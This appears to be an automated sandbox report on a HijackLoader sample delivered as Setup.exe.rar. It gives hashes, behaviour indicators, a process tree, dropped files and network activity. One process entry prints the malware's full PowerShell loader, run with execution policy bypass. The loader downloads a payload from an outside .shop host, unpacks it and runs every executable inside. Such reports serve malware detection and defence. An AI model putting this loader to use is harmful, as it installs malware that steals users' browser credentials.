File name:

Setup.exe.rar

Full analysis: https://app.any.run/tasks/b5b2066d-8e9c-437b-99f5-a738c88f753b
Verdict: Malicious activity
Threats:

HijackLoader is a modular malware acting as a vehicle for distributing different types of malicious software on compromised systems. It gained prominence during the summer of 2023 and has since been used in multiple attacks against organizations from various sectors, including hospitality businesses.

Analysis date: November 27, 2024, 14:04:07
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
autoit
susp-powershell
hijackloader
loader
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

785FEF3D3C8D2CC62A657A8C72FCBAEB

SHA1:

A9A973225667930D8375DA7F524D9D5B15AC0764

SHA256:

452A2E3930CC73210B276FECEC7BA64433A3AD89F398258C9A79DC419068F707

SSDEEP:

196608:BRn4NLPhbtyzAqUKK2iKR2p1EZeb1H55Z8s:r4x5btEAqyJKw151H5TF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Setup.exe (PID: 6960)
      • Setup.exe (PID: 3732)
      • RescueCDBurner.exe (PID: 6832)
      • RescueCDBurner.exe (PID: 6872)
      • RescueCDBurner.exe (PID: 3172)
      • RescueCDBurner.exe (PID: 6964)
      • RescueCDBurner.exe (PID: 6004)
      • RescueCDBurner.exe (PID: 6816)
    • Actions looks like stealing of personal data

      • ensuer.com (PID: 5972)
    • Steals credentials from Web Browsers

      • ensuer.com (PID: 5972)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 5252)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 5252)
    • Changes powershell execution policy (Bypass)

      • ensuer.com (PID: 5972)
      • ensuer.com (PID: 4684)
    • HIJACKLOADER has been detected (YARA)

      • RescueCDBurner.exe (PID: 6872)
      • RescueCDBurner.exe (PID: 6964)
      • RescueCDBurner.exe (PID: 6816)
      • RescueCDBurner.exe (PID: 6004)
    • Known privilege escalation attack

      • dllhost.exe (PID: 5560)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • Setup.exe (PID: 6960)
      • Setup.exe (PID: 3732)
    • Starts application with an unusual extension

      • Setup.exe (PID: 6960)
      • Setup.exe (PID: 3732)
      • more.com (PID: 7004)
      • more.com (PID: 6200)
      • RescueCDBurner.exe (PID: 6872)
      • RescueCDBurner.exe (PID: 6816)
      • RescueCDBurner.exe (PID: 6004)
      • RescueCDBurner.exe (PID: 6964)
    • Starts the AutoIt3 executable file

      • more.com (PID: 7004)
      • more.com (PID: 6200)
    • Executable content was dropped or overwritten

      • more.com (PID: 7004)
      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 5252)
      • RescueCDBurner.exe (PID: 3172)
    • BASE64 encoded PowerShell command has been detected

      • ensuer.com (PID: 5972)
      • ensuer.com (PID: 4684)
    • Starts POWERSHELL.EXE for commands execution

      • ensuer.com (PID: 5972)
      • ensuer.com (PID: 4684)
    • Base64-obfuscated command line is found

      • ensuer.com (PID: 5972)
      • ensuer.com (PID: 4684)
    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 5252)
    • Writes data to a memory stream (POWERSHELL)

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 5252)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 5252)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 5252)
      • RescueCDBurner.exe (PID: 3172)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 5252)
      • RescueCDBurner.exe (PID: 3172)
      • powershell.exe (PID: 6076)
    • Starts itself from another location

      • RescueCDBurner.exe (PID: 3172)
      • RescueCDBurner.exe (PID: 6832)
    • Connects to unusual port

      • explorer.exe (PID: 6072)
  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 6624)
    • The process uses the downloaded file

      • WinRAR.exe (PID: 6624)
    • Creates files or folders in the user directory

      • Setup.exe (PID: 6960)
    • Manual execution by a user

      • Setup.exe (PID: 6960)
      • Setup.exe (PID: 3732)
    • Reads the computer name

      • Setup.exe (PID: 6960)
      • more.com (PID: 7004)
      • Setup.exe (PID: 3732)
    • Checks supported languages

      • Setup.exe (PID: 6960)
      • more.com (PID: 7004)
      • Setup.exe (PID: 3732)
    • Disables trace logs

      • Setup.exe (PID: 6960)
      • Setup.exe (PID: 3732)
    • Checks proxy server information

      • Setup.exe (PID: 6960)
      • Setup.exe (PID: 3732)
    • Create files in a temporary directory

      • Setup.exe (PID: 6960)
      • Setup.exe (PID: 3732)
      • more.com (PID: 7004)
    • Found Base64 encoded network access via PowerShell (YARA)

      • powershell.exe (PID: 6076)
    • Found Base64 encoded file access via PowerShell (YARA)

      • powershell.exe (PID: 6076)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 5252)
    • The executable file from the user directory is run by the Powershell process

      • RescueCDBurner.exe (PID: 6832)
      • RescueCDBurner.exe (PID: 3172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion: RAR v5
CompressedSize: 15792124
UncompressedSize: 25298592
OperatingSystem: Win32
ArchivedFileName: Setup.exe.vir
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
154
Monitored processes
30
Malicious processes
15
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe setup.exe no specs more.com conhost.exe no specs setup.exe no specs more.com no specs conhost.exe no specs ensuer.com powershell.exe conhost.exe no specs ensuer.com powershell.exe conhost.exe no specs rescuecdburner.exe rescuecdburner.exe no specs #HIJACKLOADER rescuecdburner.exe no specs #HIJACKLOADER rescuecdburner.exe no specs more.com no specs conhost.exe no specs more.com no specs conhost.exe no specs CMSTPLUA #HIJACKLOADER rescuecdburner.exe no specs #HIJACKLOADER rescuecdburner.exe no specs more.com no specs conhost.exe no specs more.com no specs conhost.exe no specs explorer.exe explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2092\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exemore.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3172"C:\Users\admin\AppData\Local\20fb0aba-45b7-4605-a8ce-6eb6d36cd179\RescueCDBurner.exe"C:\Users\admin\AppData\Local\20fb0aba-45b7-4605-a8ce-6eb6d36cd179\RescueCDBurner.exe
powershell.exe
User:
admin
Company:
Rene.E Laboratory
Integrity Level:
MEDIUM
Description:
System Rescuer
Exit code:
0
Version:
ߨ”>InternalName
Modules
Images
c:\users\admin\appdata\local\20fb0aba-45b7-4605-a8ce-6eb6d36cd179\rescuecdburner.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
3524C:\WINDOWS\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exemore.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Explorer
Exit code:
0
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\khjorrid
c:\windows\syswow64\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
3608C:\WINDOWS\SysWOW64\more.comC:\Windows\SysWOW64\more.comRescueCDBurner.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
More Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\more.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3732"C:\Users\admin\Desktop\Setup.exe" C:\Users\admin\Desktop\Setup.exeexplorer.exe
User:
admin
Company:
Gammadyne Corporation
Integrity Level:
MEDIUM
Description:
Connection Keeper
Exit code:
1
Version:
22.0
Modules
Images
c:\users\admin\desktop\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
4052\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4684C:\Users\admin\AppData\Local\Temp\ensuer.comC:\Users\admin\AppData\Local\Temp\ensuer.com
more.com
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script (Beta)
Exit code:
0
Version:
3, 3, 15, 1
Modules
Images
c:\users\admin\appdata\local\temp\nreqmbdgttleu
c:\users\admin\appdata\local\temp\ensuer.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shell32.dll
5208\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5252powershell -exec bypass -Enc $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   =   { 
         S t a r t - S l e e p   - S e c o n d s   3 
 
         [ S y s t e m . N e t . W e b R e q u e s t ] : : C r e a t e ( " h t t p s : / / w w w . 3 6 0 . n e t " ) . G e t R e s p o n s e ( ) . C l o s e ( ) 
 
         S t a r t - S l e e p   - S e c o n d s   1 
 
         [ S y s t e m . N e t . W e b R e q u e s t ] : : C r e a t e ( " h t t p s : / / w w w . b a i d u . c o m " ) . G e t R e s p o n s e ( ) . C l o s e ( ) 
 
         S t a r t - S l e e p   - S e c o n d s   1 
 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q   =   " h t t p s : / / r a s a 2 . r 2 c l o u d l o k i z y o 9 . s h o p / i n t _ c l p _ p a n . t x t " 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q   =   N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q   =   $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q . D o w n l o a d D a t a ( $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q ) 
 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q   =   N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q . W r i t e ( $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q ,   0 ,   $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q . L e n g t h ) 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q . S e e k ( 0 ,   [ S y s t e m . I O . S e e k O r i g i n ] : : B e g i n ) 
 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q   =   [ S y s t e m . G u i d ] : : N e w G u i d ( ) . T o S t r i n g ( ) 
         $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   =   [ S y s t e m . I O . P a t h ] : : C o m b i n e ( $ e n v : L O C A L A P P D A T A ,   $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q ) 
         N e w - I t e m   - P a t h   $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   - I t e m T y p e   D i r e c t o r y   - F o r c e   |   O u t - N u l l 
 
         $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   =   [ S y s t e m . I O . P a t h ] : : C o m b i n e ( $ e n v : T E M P ,   " $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q . z i p " ) 
         [ S y s t e m . I O . F i l e ] : : W r i t e A l l B y t e s ( $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m ,   $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q . T o A r r a y ( ) ) 
 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q   =   N e w - O b j e c t   - C o m O b j e c t   S h e l l . A p p l i c a t i o n 
         $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   =   $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q . N a m e S p a c e ( $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m ) 
         $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   =   $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q . N a m e S p a c e ( $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m ) 
 
         $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m . C o p y H e r e ( $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m . I t e m s ( ) ,   2 0 ) 
 
         $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q   =   G e t - C h i l d I t e m   - P a t h   $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   - F i l t e r   * . e x e   - R e c u r s e 
         f o r e a c h   ( $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   i n   $ q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q q )   { 
                 S t a r t - P r o c e s s   - F i l e P a t h   $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m . F u l l N a m e   - N o N e w W i n d o w   - W a i t 
         } 
 
         # R e m o v e - I t e m   - P a t h   $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   - R e c u r s e   - F o r c e 
 } 
 
 &   $ m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m   >   $ n u l l   2 > & 1 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ensuer.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
5560C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\SysWOW64\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
Total events
25 390
Read events
25 346
Write events
44
Delete events
0

Modification events

(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\Setup.exe.rar
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:name
Value:
256
(PID) Process:(6624) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:size
Value:
80
Executable files
172
Suspicious files
11
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
7004more.comC:\Users\admin\AppData\Local\Temp\kotthnfysvspd
MD5:
SHA256:
6200more.comC:\Users\admin\AppData\Local\Temp\nreqmbdgttleu
MD5:
SHA256:
6076powershell.exeC:\Users\admin\AppData\Local\Temp\20fb0aba-45b7-4605-a8ce-6eb6d36cd179.zipcompressed
MD5:1047114E36AB7ECB34C6FE2842C45E68
SHA256:7F2AE730D1009672557FA130C04276D92BE186FFEC5595AAE1ABE86D5BEE83F7
6076powershell.exeC:\Users\admin\AppData\Local\20fb0aba-45b7-4605-a8ce-6eb6d36cd179\api-ms-win-core-processthreads-l1-1-1.dllexecutable
MD5:9C9B50B204FCB84265810EF1F3C5D70A
SHA256:25A99BDF8BF4D16077DC30DD9FFEF7BB5A2CEAF9AFCEE7CF52AD408355239D40
6960Setup.exeC:\Users\admin\AppData\Local\Temp\12112012image
MD5:C5B32D7E171647B6F6CCB3B1E3EF7F09
SHA256:A94E71A280B2516FB3E9E3114269C515F6A1318153760B35CC6C24C7564C8874
6960Setup.exeC:\Users\admin\AppData\Local\Temp\122dc7f5binary
MD5:B7297830A96B5B408C04F4AF116BAC39
SHA256:0CC22CDF6615021B844EF96A9C3C1CAC0EB595D9562B6F51B8087143F1F96C16
6076powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kj5hsw2d.lpr.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7004more.comC:\Users\admin\AppData\Local\Temp\ensuer.comexecutable
MD5:3F58A517F1F4796225137E7659AD2ADB
SHA256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
3732Setup.exeC:\Users\admin\AppData\Local\Temp\142fa270image
MD5:C5B32D7E171647B6F6CCB3B1E3EF7F09
SHA256:A94E71A280B2516FB3E9E3114269C515F6A1318153760B35CC6C24C7564C8874
3732Setup.exeC:\Users\admin\AppData\Local\Temp\144aaf55binary
MD5:B7297830A96B5B408C04F4AF116BAC39
SHA256:0CC22CDF6615021B844EF96A9C3C1CAC0EB595D9562B6F51B8087143F1F96C16
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
60
DNS requests
24
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.167:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6312
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
7156
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7156
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
244
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.167:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3220
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5064
SearchApp.exe
104.126.37.130:443
www.bing.com
Akamai International B.V.
DE
whitelisted
1176
svchost.exe
20.190.159.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.167
  • 23.48.23.141
  • 23.48.23.176
  • 23.48.23.145
  • 23.48.23.143
  • 23.48.23.139
  • 23.48.23.156
  • 23.48.23.159
  • 23.48.23.140
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 88.221.169.152
whitelisted
google.com
  • 172.217.16.142
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
whitelisted
www.bing.com
  • 104.126.37.130
  • 104.126.37.131
  • 104.126.37.139
  • 104.126.37.145
  • 104.126.37.144
  • 104.126.37.152
  • 104.126.37.146
  • 104.126.37.128
  • 104.126.37.137
whitelisted
login.live.com
  • 20.190.159.68
  • 20.190.159.23
  • 20.190.159.75
  • 40.126.31.67
  • 20.190.159.73
  • 20.190.159.0
  • 20.190.159.64
  • 40.126.31.69
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
arc.msn.com
  • 20.103.156.88
whitelisted
fd.api.iris.microsoft.com
  • 20.199.58.43
whitelisted

Threats

No threats detected
No debug info